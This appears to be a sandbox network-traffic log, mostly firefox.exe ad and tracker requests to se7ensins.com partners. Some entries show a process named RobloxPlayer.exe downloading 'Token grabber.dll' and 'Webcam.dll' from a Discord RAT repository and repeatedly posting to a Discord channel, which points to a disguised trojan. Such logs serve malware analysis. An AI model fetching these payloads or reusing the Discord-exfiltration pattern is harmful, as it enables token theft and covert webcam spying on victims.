13.5kB
12
19

HTTP Request

GET https://static.cloudflareinsights.com/beacon.min.js/vef91dfe02fce4ee0ad053f6de4f175db1715022073587

HTTP Response

200
104.18.20.206:443

https://a.pub.network/se7ensins-com/pubfig.min.js

tls, http2

firefox.exe

1.9kB
50.0kB
18
48

HTTP Request

GET https://a.pub.network/se7ensins-com/pubfig.min.js

HTTP Response

200
34.160.152.31:443

https://d.pub.network/v2/sites/se7ensins-com/configs?env=PROD

tls, http2

firefox.exe

1.9kB
13.7kB
17
24

HTTP Request

GET https://d.pub.network/v2/sites/se7ensins-com/configs?env=PROD
3.162.140.119:443

https://cmp.quantcast.com/choice/4rCU9BwHgu6h5/www.se7ensins.com/choice.js?tag_version=V2

tls, http2

firefox.exe

1.7kB
6.5kB
13
15

HTTP Request

GET https://cmp.quantcast.com/choice/4rCU9BwHgu6h5/www.se7ensins.com/choice.js?tag_version=V2

HTTP Response

301
91.228.74.244:443

secure.quantserve.com

tls

firefox.exe

4.4kB
25.0kB
27
33
185.199.109.133:443

https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll

tls, http

RobloxPlayer.exe

40.5kB
3.0MB
783
2155

HTTP Request

GET https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll

HTTP Response

200
18.66.171.123:443

https://rules.quantcount.com/rules-p-4rCU9BwHgu6h5.js

tls, http2

firefox.exe

1.7kB
6.6kB
13
12

HTTP Request

GET https://rules.quantcount.com/rules-p-4rCU9BwHgu6h5.js

HTTP Response

200
18.66.171.20:443

https://cmp.inmobi.com/geoip

tls, http2

firefox.exe

5.2kB
185.5kB
70
145

HTTP Request

GET https://cmp.inmobi.com/choice/4rCU9BwHgu6h5/www.se7ensins.com/choice.js?tag_version=V2

HTTP Response

200

HTTP Request

GET https://cmp.inmobi.com/tcfv2/cmp2.js?referer=www.se7ensins.com/

HTTP Response

200

HTTP Request

GET https://cmp.inmobi.com/geoip

HTTP Response

200

HTTP Request

GET https://cmp.inmobi.com/GVL-v2/cmp-list.json

HTTP Response

200

HTTP Request

GET https://cmp.inmobi.com/GVL-v2/vendor-list-trimmed-v1.json

HTTP Response

200

HTTP Request

GET https://cmp.inmobi.com/tcfv2/53/cmp2ui-en.js

HTTP Response

200

HTTP Request

GET https://cmp.inmobi.com/geoip

HTTP Response

200
34.111.152.239:443

https://optimise.net/?k=0&d=se7ensins.com&t=desktop

tls, http2

firefox.exe

2.0kB
8.8kB
16
16

HTTP Request

GET https://optimise.net/?k=0&d=se7ensins.com&t=desktop
3.120.230.251:443

https://api.cmp.inmobi.com/?log=%7B%22userEvents%22%3A%5B%7B%22clientTimestamp%22%3A1716689173228%2C%22event%22%3A%22startOnPage%3AGDPR_0%22%7D%2C%7B%22clientTimestamp%22%3A1716689179610%2C%22event%22%3A%22acceptAll%3Aclick%22%7D%5D%2C%22acceptanceState%22%3A%22All%22%2C%22objectionState%22%3A%22None%22%2C%22tcData%22%3A%22CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA%22%2C%22nonIabConsentData%22%3A%22%22%2C%22clientTimestamp%22%3A1716689179610%2C%22operationType%22%3A%22done%22%2C%22sessionId%22%3A%22GDPR-dr6v5hxjvgca2i21gkwd%22%7D

tls, http2

firefox.exe

3.6kB
6.3kB
14
19

HTTP Request

GET https://api.cmp.inmobi.com/?log=%7B%22accountId%22%3A%224rCU9BwHgu6h5%22%2C%22domain%22%3A%22www.se7ensins.com%22%2C%22publisher%22%3A%22Se7enSins%22%2C%22cmpId%22%3A10%2C%22cmpVersion%22%3A%222.53%22%2C%22displayType%22%3A%22tcfui%3Amandatory%22%2C%22configurationHashCode%22%3A%22UuhOy8%2B9eY8AWn3z6h8Evg%22%2C%22tagVersion%22%3A%22V2%22%2C%22gvlVersion%22%3A2%2C%22clientTimestamp%22%3A1716689173228%2C%22operationType%22%3A%22init%22%2C%22sessionId%22%3A%22GDPR-dr6v5hxjvgca2i21gkwd%22%7D

HTTP Response

200

HTTP Request

GET https://api.cmp.inmobi.com/?log=%7B%22userEvents%22%3A%5B%7B%22clientTimestamp%22%3A1716689173228%2C%22event%22%3A%22startOnPage%3AGDPR_0%22%7D%2C%7B%22clientTimestamp%22%3A1716689179610%2C%22event%22%3A%22acceptAll%3Aclick%22%7D%5D%2C%22acceptanceState%22%3A%22All%22%2C%22objectionState%22%3A%22None%22%2C%22tcData%22%3A%22CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA%22%2C%22nonIabConsentData%22%3A%22%22%2C%22clientTimestamp%22%3A1716689179610%2C%22operationType%22%3A%22done%22%2C%22sessionId%22%3A%22GDPR-dr6v5hxjvgca2i21gkwd%22%7D

HTTP Response

200
162.159.137.232:443

https://discord.com/api/v9/channels/1244109081116151869/messages

tls, http

RobloxPlayer.exe

1.2kB
2.8kB
9
10

HTTP Request

POST https://discord.com/api/v9/channels/1244109081116151869/messages

HTTP Response

200
34.111.152.239:443

https://optimise.net/?k=0&d=se7ensins.com&t=desktop

tls, http2

firefox.exe

1.7kB
6.4kB
12
12

HTTP Request

OPTIONS https://optimise.net/?k=0&d=se7ensins.com&t=desktop
162.159.137.232:443

https://discord.com/api/v9/channels/1244109081116151869/messages

tls, http

RobloxPlayer.exe

1.1kB
2.8kB
8
9

HTTP Request

POST https://discord.com/api/v9/channels/1244109081116151869/messages

HTTP Response

200
34.160.128.112:443

https://api.floors.dev/sgw/v1/floors?d=se7ensins.com&t=desktop&k=0&r=0

tls, http2

firefox.exe

2.1kB
7.4kB
16
17

HTTP Request

OPTIONS https://api.floors.dev/sgw/v1/floors?d=se7ensins.com&t=desktop&k=0&r=0

HTTP Request

GET https://api.floors.dev/sgw/v1/floors?d=se7ensins.com&t=desktop&k=0&r=0
34.160.128.112:443

api.floors.dev

tls, http2

firefox.exe

1.2kB
5.7kB
10
11
142.250.200.34:443

https://securepubads.g.doubleclick.net/tag/js/gpt.js

tls, http2

firefox.exe

2.4kB
37.9kB
28
40

HTTP Request

GET https://securepubads.g.doubleclick.net/tag/js/gpt.js
162.159.137.232:443

https://discord.com/api/v9/channels/1244109081116151869/messages

tls, http

RobloxPlayer.exe

1.1kB
2.9kB
8
10

HTTP Request

POST https://discord.com/api/v9/channels/1244109081116151869/messages

HTTP Response

200
3.162.140.91:443

https://sb.scorecardresearch.com/b?c1=2&c2=23384447&cs_it=b9&cv=4.0.0%2B2301240627&ns__t=1716689180476&ns_c=UTF-8&gdpr=1&gdpr_p1t=0&gdpr_li=0&gdpr_purps=1%2C7%2C8%2C9%2C10&gdpr_pcc=US&cs_cmp_nc=0&cs_cmp_id=10&cs_cmp_sv=53&cs_cmp_rt=8&c7=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&c8=How%20to%20tell%20if%20you%27ve%20been%20ratted%20%7C%20Se7enSins%20Gaming%20Community&c9=https%3A%2F%2Fwww.google.com%2F

tls, http2

firefox.exe

2.1kB
9.7kB
14
18

HTTP Request

GET https://sb.scorecardresearch.com/beacon.js

HTTP Response

200

HTTP Request

GET https://sb.scorecardresearch.com/b?c1=2&c2=23384447&cs_it=b9&cv=4.0.0%2B2301240627&ns__t=1716689180476&ns_c=UTF-8&gdpr=1&gdpr_p1t=0&gdpr_li=0&gdpr_purps=1%2C7%2C8%2C9%2C10&gdpr_pcc=US&cs_cmp_nc=0&cs_cmp_id=10&cs_cmp_sv=53&cs_cmp_rt=8&c7=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&c8=How%20to%20tell%20if%20you%27ve%20been%20ratted%20%7C%20Se7enSins%20Gaming%20Community&c9=https%3A%2F%2Fwww.google.com%2F

HTTP Response

204
91.228.74.159:443

pixel.quantserve.com

tls

firefox.exe

1.4kB
3.9kB
12
10
104.18.43.90:443

https://cdn.confiant-integrations.net/qaKtxuL1KR_2Tfmz0NmPaAudsBc/gpt_and_prebid/config.js

tls, http2

firefox.exe

1.8kB
29.0kB
15
30

HTTP Request

GET https://cdn.confiant-integrations.net/qaKtxuL1KR_2Tfmz0NmPaAudsBc/gpt_and_prebid/config.js

HTTP Response

200
104.26.9.50:443

https://freestar-io.videoplayerhub.com/gallery.js

tls, http2

firefox.exe

1.6kB
7.0kB
11
13

HTTP Request

GET https://freestar-io.videoplayerhub.com/gallery.js

HTTP Response

301
104.22.53.173:443

https://cdn.hadronid.net/hadron.js?url=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&ref=https%3A%2F%2Fwww.google.com%2F&_it=freestar&partner_id=474&ha=_hadron

tls, http2

firefox.exe

1.7kB
17.1kB
12
26

HTTP Request

GET https://cdn.hadronid.net/hadron.js?url=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&ref=https%3A%2F%2Fwww.google.com%2F&_it=freestar&partner_id=474&ha=_hadron

HTTP Response

200
104.22.75.216:443

https://btloader.com/tag?h=freestar-io&upapi=true

tls, http2

firefox.exe

1.7kB
26.0kB
13
30

HTTP Request

GET https://btloader.com/tag?h=freestar-io&upapi=true

HTTP Response

200
104.22.5.69:443

https://id.hadron.ad.gt/api/v1/rtd

tls, http2

firefox.exe

19.9kB
9.7kB
48
57

HTTP Request

OPTIONS https://id.hadron.ad.gt/v1/hadron.json?_it=freestar&partner_id=474&sync=0&domain=www.se7ensins.com&url=https://www.se7ensins.com/forums/threads/how-to-tell-if-youve-been-ratted.470346/

HTTP Response

200

HTTP Request

GET https://id.hadron.ad.gt/v1/hadron.json?_it=freestar&partner_id=474&sync=0&domain=www.se7ensins.com&url=https://www.se7ensins.com/forums/threads/how-to-tell-if-youve-been-ratted.470346/

HTTP Response

200

HTTP Request

GET https://id.hadron.ad.gt/api/v1/pbhid?partner_id=474&_it=prebid&t=1&src=id&gdprString=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdpr=1&us_privacy=1---

HTTP Response

200

HTTP Request

OPTIONS https://id.hadron.ad.gt/api/v1/rtd

HTTP Request

OPTIONS https://id.hadron.ad.gt/api/v1/rtd

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://id.hadron.ad.gt/api/v1/rtd

HTTP Request

POST https://id.hadron.ad.gt/api/v1/rtd

HTTP Response

200

HTTP Response

200

HTTP Request

OPTIONS https://id.hadron.ad.gt/api/v1/rtd

HTTP Request

OPTIONS https://id.hadron.ad.gt/api/v1/rtd

HTTP Request

OPTIONS https://id.hadron.ad.gt/api/v1/rtd

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://id.hadron.ad.gt/api/v1/rtd

HTTP Request

POST https://id.hadron.ad.gt/api/v1/rtd

HTTP Response

200

HTTP Request

POST https://id.hadron.ad.gt/api/v1/rtd

HTTP Response

200

HTTP Response

200

HTTP Response

200
104.22.5.69:443

id.hadron.ad.gt

tls, http2

firefox.exe

1.2kB
5.7kB
10
9
3.162.142.187:443

https://c.amazon-adsystem.com/bao-csm/aps-comm/aps_csm.js

tls, http2

firefox.exe

2.4kB
91.3kB
24
77

HTTP Request

GET https://c.amazon-adsystem.com/aax2/apstag.js

HTTP Response

200

HTTP Request

GET https://c.amazon-adsystem.com/cdn/prod/config?src=600&u=https%3A%2F%2Fwww.se7ensins.com&pubid=0ab198dd-b265-462a-ae36-74e163ad6159

HTTP Request

GET https://c.amazon-adsystem.com/bao-csm/aps-comm/aps_csm.js

HTTP Response

200

HTTP Response

200
185.199.109.133:443

https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll

tls, http

RobloxPlayer.exe

989 B
43.5kB
9
37

HTTP Request

GET https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll

HTTP Response

200
172.67.23.234:443

https://a.ad.gt/api/v1/u/matches/474?_it=freestar

tls, http2

firefox.exe

1.6kB
10.6kB
11
19

HTTP Request

GET https://a.ad.gt/api/v1/u/matches/474?_it=freestar

HTTP Response

200
104.22.75.216:443

https://btloader.com/websiteconfig?bt_env=prod&o=5714937848528896&w=se7ensins.com

tls, http2

firefox.exe

1.7kB
7.1kB
12
15

HTTP Request

GET https://btloader.com/websiteconfig?bt_env=prod&o=5714937848528896&w=se7ensins.com

HTTP Response

200
104.26.2.70:443

https://ad-delivery.net/px.gif?ch=1&e=0.2469733343036421

tls, http2

firefox.exe

1.8kB
7.8kB
14
17

HTTP Request

GET https://ad-delivery.net/px.gif?ch=2

HTTP Response

200

HTTP Request

GET https://ad-delivery.net/px.gif?ch=1&e=0.2469733343036421

HTTP Response

200
162.159.137.232:443

https://discord.com/api/v9/channels/1244109081116151869/messages

tls, http

RobloxPlayer.exe

1.2kB
2.9kB
10
10

HTTP Request

POST https://discord.com/api/v9/channels/1244109081116151869/messages

HTTP Response

200
3.75.62.37:443

https://ups.analytics.yahoo.com/ups/58827/sync?redir=true&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gpp=&gpp_sid=

tls, http2

firefox.exe

4.1kB
5.8kB
13
16

HTTP Request

GET https://ups.analytics.yahoo.com/ups/58657/fed?v=1&1p=0&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=1---&url=https://www.se7ensins.com/forums/threads/how-to-tell-if-youve-been-ratted.470346/&pixelId=58657

HTTP Request

GET https://ups.analytics.yahoo.com/ups/58827/sync?redir=true&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA